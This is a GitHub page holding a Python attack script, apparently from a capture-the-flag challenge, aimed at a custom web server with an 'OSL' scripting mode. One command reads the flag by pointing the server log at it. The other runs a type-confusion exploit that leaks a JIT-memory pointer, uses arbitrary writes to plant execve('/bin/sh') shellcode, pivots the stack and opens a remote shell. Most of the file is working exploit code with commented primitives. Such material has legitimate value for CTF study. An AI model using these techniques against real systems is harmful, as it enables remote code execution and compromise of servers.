-
Notifications
You must be signed in to change notification settings - Fork 2
/
exploit.py
executable file
·365 lines (280 loc) · 11.1 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
#!/usr/bin/env python
from os.path import *
import re
import random
import string
import time
import sys
import traceback
import requests
import click
from pwn import *
# pwntools global context: target architecture used when assembling the
# shellcode, and pwntools' own log verbosity (do_type_confusion_exploit
# switches the level to 'info' when it runs).
context.arch = 'amd64'
context.log_level = 'error'
# Default target. The exploit1/exploit2 commands overwrite HOST and PORT with
# their --host/--port options before any connection is opened.
HOST = 'localhost'
PORT = 8080
# A truthy DEBUG enables the extra diagnostic prints in the helpers.
DEBUG = 0
# Timeout passed to recvuntil() while reading the response status line and
# headers (presumably seconds, per pwntools convention). None means "call
# recvuntil() without an explicit timeout".
TIMEOUT = 3.0
# exec ./exploit.py --help for usage notes
# Root click command group; the exploit1 and exploit2 subcommands are
# registered on it through @cli.command().
# NOTE: documented with comments on purpose -- click would show a docstring in
# the --help output.
@click.group()
def cli():
    pass
# Subcommand "exploit1": run the "print log" exploit against --host/--port.
# Documented with comments rather than a docstring so that click's --help
# output stays exactly as it was.
@cli.command()
@click.option('-h', '--host', default='localhost')
@click.option('-p', '--port', type=int, default=8080)
def exploit1(host, port):
    global HOST, PORT
    print('Target: {}:{}'.format(host, port))
    print('Running exploit print log')
    # The network helpers read the target from these module-level globals.
    HOST, PORT = host, port
    do_print_log_exploit()
# Subcommand "exploit2": run the type-confusion exploit against --host/--port.
# With --shell the connection is handed over interactively instead of just
# reading the flag. Documented with comments rather than a docstring so that
# click's --help output stays exactly as it was.
@cli.command()
@click.option('-h', '--host', default='localhost')
@click.option('-p', '--port', type=int, default=8080)
@click.option('--shell', is_flag=True)
def exploit2(host, port, shell):
    global HOST, PORT
    print('Target: {}:{}'.format(host, port))
    print('Running exploit type confusion')
    # The network helpers read the target from these module-level globals.
    HOST, PORT = host, port
    do_type_confusion_exploit(shell=shell)
def do_print_log_exploit():
    """Read the flag by making the server's log point at it, then printing it.

    Everything happens over one connection:
      1. upload an OSL script that consists of ``print log;``;
      2. upload a config whose server block sets ``log "flag"`` and serves the
         uploaded script in ``osl`` mode;
      3. GET the script and print the stripped response body as the flag.

    Returns True on success. Any status code other than 200 trips an assert.
    """
    status, script_name, conn = do_upload_file(data='print log;')
    assert status == 200

    # Doubled braces are literal braces for str.format().
    config = '''
server {{
server_name "dumplog.com";
root "uploads";
log "flag";
location "/{upload_osl_fn}" {{
mode osl;
}}
}}
'''.format(upload_osl_fn=script_name)

    if DEBUG:
        print('upload_osl_fn: ' + script_name)
        print('log_test_config: ' + config)

    status, _, conn = do_upload_config(data=config, io=conn)
    assert status == 200

    status, body, _ = do_get(
        host='dumplog.com', path='/{}'.format(script_name), io=conn)
    assert status == 200

    print('FLAG: ' + body.strip())
    return True
def do_type_confusion_exploit(shell=False):
    """Run the OSL type-confusion exploit and print the flag (or give a shell).

    shell -- when true, hand the connection over to the user with
             io.interactive() instead of sending ``cat /flag``.

    Returns True once the connection has been closed.
    """
    context.log_level = 'info'
    conn = setup_osl_config()

    # Some useful snippets (not necessarily for this specific exploit):
    #
    # * relative read from the "asd" ptr
    #       x = 1 + "asd"; print x;
    #
    # * relative write from the "asd" ptr
    #       x = "aaaaa";
    #       y = 1 + x;
    #       y = "bbb";
    #       print x;
    #   this prints "abbba"
    #
    # * arbitrary read 1 (the bug is that "store int" does not set the len)
    #       x = "aaaaaaaaaaaaaaaa"; x = 93824992261263; print x;
    #   this reads from the 938... address
    #
    # * arbitrary read 2 (the bug is that printing a huge number overflows
    #   into the len field)
    #       x = 100000000; print x; x = <addr>; print x; del x;
    #   the "del" is not strictly necessary, but it makes this code easier
    #   to reuse
    #
    # * arbitrary write 1
    #       x = 100000000; print x; x = <where>; x = "AAAAAAAA"; del x;
    #   this will write AAAAAAAA to <where>; it works because:
    #     1) the print of a huge number overflows on the len, so this slot is
    #        treated as a str from now on;
    #     2) x = 123 just overwrites the str ptr, not the len (due to a bug
    #        in store int);
    #     3) x = "AAAAAAAA" triggers a str assignment: the ptr is used to
    #        know "where" to write, achieving arbitrary write.
    #
    # * leak pointer to jitted area
    #     - store a string in a variable. If the string is short, the first
    #       8 bytes of the 32-byte string contain a pointer to the jitter
    #       memory.
    #     - 'x = "asd"; y = x+0; print y;'
    #     - y will contain the ptr relative to the jitter memory +
    #       int("asd") (because "asd" is stored in 16 bytes adjacent to the
    #       ptr to the string). This exploits the bug that the sum (and
    #       other operations) assume the operands are integers.
    #
    # * leak pointer to stack, libc, etc.
    #     - from a leak of the jit area, you can leak the stack pointer from
    #       the metadata, and then the libc and other structures

    # Notes on this specific exploit:
    # - leak ptr to jitter area:
    #     - x = "asd"; y = x+0; print y;
    # - use arbitrary write 1 to write an execve(/bin/sh) shellcode to
    #   jit_mem_addr+0x100
    # - use arbitrary write 1 to write, at the end of the shellcode, the
    #   address of jit_mem_addr+0x100
    #     - this will be used by the final "ret" in the epilog
    # - use arbitrary write 1 to write to the saved stack pointer, pivoting
    #   the stack to jit_mem_addr+0x100
    # - the epilog code will pop the shellcode into all registers.
    #   Eventually, the ret will load the jit_mem_addr+0x100 address.
    # - the execution is now transferred to the shellcode, getting you a
    #   shell (or the flag)

    def addr_to_escaped_str(addr):
        # Render the packed 64-bit value as literal "\xNN" escapes, one per
        # byte, for embedding in an OSL string literal.
        assert type(addr) in (int, long)
        return ''.join('\\x%02x' % ord(byte) for byte in p64(addr))

    def gen_write_64(where, what):
        # One "arbitrary write 1" statement sequence: store `what` at `where`.
        assert type(where) in (int, long)
        assert type(what) in (int, long)
        template = 'x = 100000000; print x; x = {:d}; x = "{}"; del x;\n'
        return template.format(where, addr_to_escaped_str(what))

    leak_program = 'x = "asd"; y = x+0; print y;'
    leaked = run_osl_program(conn, leak_program)
    # Undo the two known offsets added to the pointer: the integer value of
    # the bytes "asd" and a further 16.
    asd_as_int = int('dsa'.encode('hex'), 16)
    jit_mem_addr = int(leaked.strip()) - asd_as_int - 16
    print('jit_mem_addr: ' + hex(jit_mem_addr))

    text_mem_addr = jit_mem_addr + 0x500  # computed but not used below
    saved_stack_addr = jit_mem_addr - 0x10
    payload_addr = jit_mem_addr + 0x100

    shellcode = asm(shellcraft.sh())
    assert len(shellcode) == 48

    # Qwords laid out from payload_addr upwards: six shellcode qwords, nine
    # filler qwords ("IIIIIIII" down to "AAAAAAAA"), then payload_addr itself
    # as the address the final "ret" picks up.
    qwords = [u64(shellcode[off:off + 8]) for off in range(0, 48, 8)]
    qwords.extend(u64(letter * 8) for letter in 'IHGFEDCBA')
    qwords.append(payload_addr)

    statements = [
        gen_write_64(payload_addr + 8 * index, value)
        for index, value in enumerate(qwords)
    ]
    # pivot stack to jit_mem_addr
    statements.append(gen_write_64(saved_stack_addr, payload_addr))
    op = ''.join(statements)

    print('OP: %s' % op)
    # No HTTP response is awaited for this request.
    run_osl_program(conn, op, wait_for_response=False)

    if shell:
        conn.interactive()
    else:
        conn.send('cat /flag\n')
        flag = conn.recv(4096).strip()
        print('FLAG: %s' % flag)
    conn.close()
    return True
def do_get(host, path, io=None, close_io=True, wait_for_response=True):
    """Send a GET for `path` with the given Host header.

    io                -- existing connection to reuse; None opens a new one.
    close_io          -- close the connection afterwards (returned io is None).
    wait_for_response -- when false, the response is not read and the call
                         reports status 200 with an empty body.

    Returns (status_code, content, io).
    """
    io = handle_http_request('GET', host=host, path=path, io=io)

    # Placeholder result for the fire-and-forget case.
    status_code, content = 200, ''
    if wait_for_response:
        status_code, content = handle_http_response(io, close_io=close_io)

    if close_io:
        io.close()
        io = None
    return status_code, content, io
def do_upload_file(data, io=None, close_io=False):
    """Upload `data` with the server's 'UF' method.

    io       -- existing connection to reuse; None opens a new one.
    close_io -- close the connection afterwards (returned io is None).

    Returns (status_code, content, io). Callers in this file use `content` as
    the name of the uploaded file.
    """
    io = handle_http_request('UF', data=data, io=io)
    code, body = handle_http_response(io, close_io=close_io)
    if close_io:
        io.close()
        io = None
    return code, body, io
def do_upload_config(data, io=None, close_io=False):
    """Upload the config text `data` with the server's 'UC' method.

    io       -- existing connection to reuse; None opens a new one.
    close_io -- close the connection afterwards (returned io is None).

    Returns (status_code, content, io).
    """
    io = handle_http_request('UC', data=data, io=io)
    code, body = handle_http_response(io, close_io=close_io)
    if close_io:
        io.close()
        io = None
    return code, body, io
def handle_http_request(method, host=None, path=None, data=None, io=None):
    """Write one request to the server and return the connection used.

    method -- 'GET', 'UF' or 'UC' (anything else trips an assert).
    host   -- Host header value; defaults to 'doesnotmatter.com'.
    path   -- request path; defaults to '/'.
    data   -- optional body; when given, a Content-Length header is sent too.
    io     -- existing connection to reuse; None connects to HOST:PORT.
    """
    assert method in ['GET', 'UF', 'UC']
    host = 'doesnotmatter.com' if host is None else host
    path = '/' if path is None else path
    has_body = data is not None

    if DEBUG:
        print('method: {}, host: {}, path: {}, data: {}'.format(
            method, host, path, 'yes' if has_body else 'no'))

    if io is None:
        if DEBUG:
            print('opening new connection')
        io = remote(HOST, PORT)

    # Each piece is sent with its own send() call, in wire order.
    pieces = [
        '{} {} HTTP/1.1\r\n'.format(method, path),
        'Host: {}\r\n'.format(host),
    ]
    if has_body:
        pieces.append('Content-Length: {}\r\n'.format(len(data)))
    pieces.append('\r\n')
    if has_body:
        pieces.append(data)

    for piece in pieces:
        io.send(piece)
    return io
def handle_http_response(io, close_io=True):
    """Read and validate one HTTP response from `io`.

    io       -- connection object providing recvuntil(), recvn() and close().
    close_io -- close the connection before returning, including when
                validation fails.

    Returns (status_code, content).

    Raises AssertionError when the response does not look as expected (wrong
    protocol token, malformed header line, missing mandatory header, status
    text not matching the status code, or a body shorter than Content-Length)
    and KeyError for a status code other than 200/400/404.
    """
    # Apply the module-wide TIMEOUT to every read, or the library default
    # when TIMEOUT is None.
    recv_kwargs = {} if TIMEOUT is None else {'timeout': TIMEOUT}

    try:
        # Status line: "HTTP/1.1 <code> <message>".
        status_line = io.recvuntil('\r\n', **recv_kwargs)
        tokens = status_line.strip().split(' ', 2)
        assert tokens[0] == 'HTTP/1.1'
        status_code = int(tokens[1])
        status_msg = tokens[2]

        # Headers, up to the first empty line. A read that comes back empty
        # (e.g. after a timeout) also ends the loop.
        headers = {}
        while True:
            line = io.recvuntil('\r\n', **recv_kwargs).strip()
            if line == '':
                break
            assert ':' in line
            key, value = line.split(':', 1)
            headers[key] = value.strip()

        # check mandatory headers
        for name in ('Server', 'Content-Type', 'Content-Length', 'Connection'):
            assert name in headers

        expected_status_msg = {
            200: 'OK',
            400: 'Bad Request',
            404: 'Not Found',
        }
        assert status_msg == expected_status_msg[status_code]

        content_len = int(headers['Content-Length'])
        if content_len > 0:
            # recv(n) may return fewer than n bytes when the body arrives in
            # several segments; recvn() keeps reading until it has exactly n.
            content = io.recvn(content_len, **recv_kwargs)
            assert len(content) == content_len, (
                'short body: got {} of {} bytes'.format(
                    len(content), content_len))
        else:
            content = ''
    finally:
        # Release the socket even when one of the checks above fails.
        if close_io:
            io.close()

    return status_code, content
def setup_osl_config():
    """Upload a config that serves "exploit.com" in osl mode.

    Opens a new connection for the upload and returns it, still open, so that
    later requests can reuse it. Asserts that the upload returned 200.
    """
    config_text = '''
server {
server_name "exploit.com";
root "uploads";
mode osl;
}
'''
    code, _, conn = do_upload_config(data=config_text)
    assert code == 200
    return conn
def run_osl_program(io, osl_program, wait_for_response=True):
    """Upload `osl_program` over `io`, request it, and return the response body.

    The program is uploaded as a file and then fetched with Host
    "exploit.com"; the connection is left open. With wait_for_response false
    the GET response is not read and the returned body is ''.
    Asserts that both steps report status 200.
    """
    print('Running: "{}"'.format(osl_program))

    code, uploaded_name, io = do_upload_file(data=osl_program, io=io)
    assert code == 200

    code, body, io = do_get(
        host='exploit.com',
        path='/{}'.format(uploaded_name),
        io=io,
        close_io=False,
        wait_for_response=wait_for_response,
    )
    assert code == 200
    return body
# Script entry point: invoke the click group, which dispatches to the
# exploit1 or exploit2 subcommand.
if __name__ == '__main__':
    cli()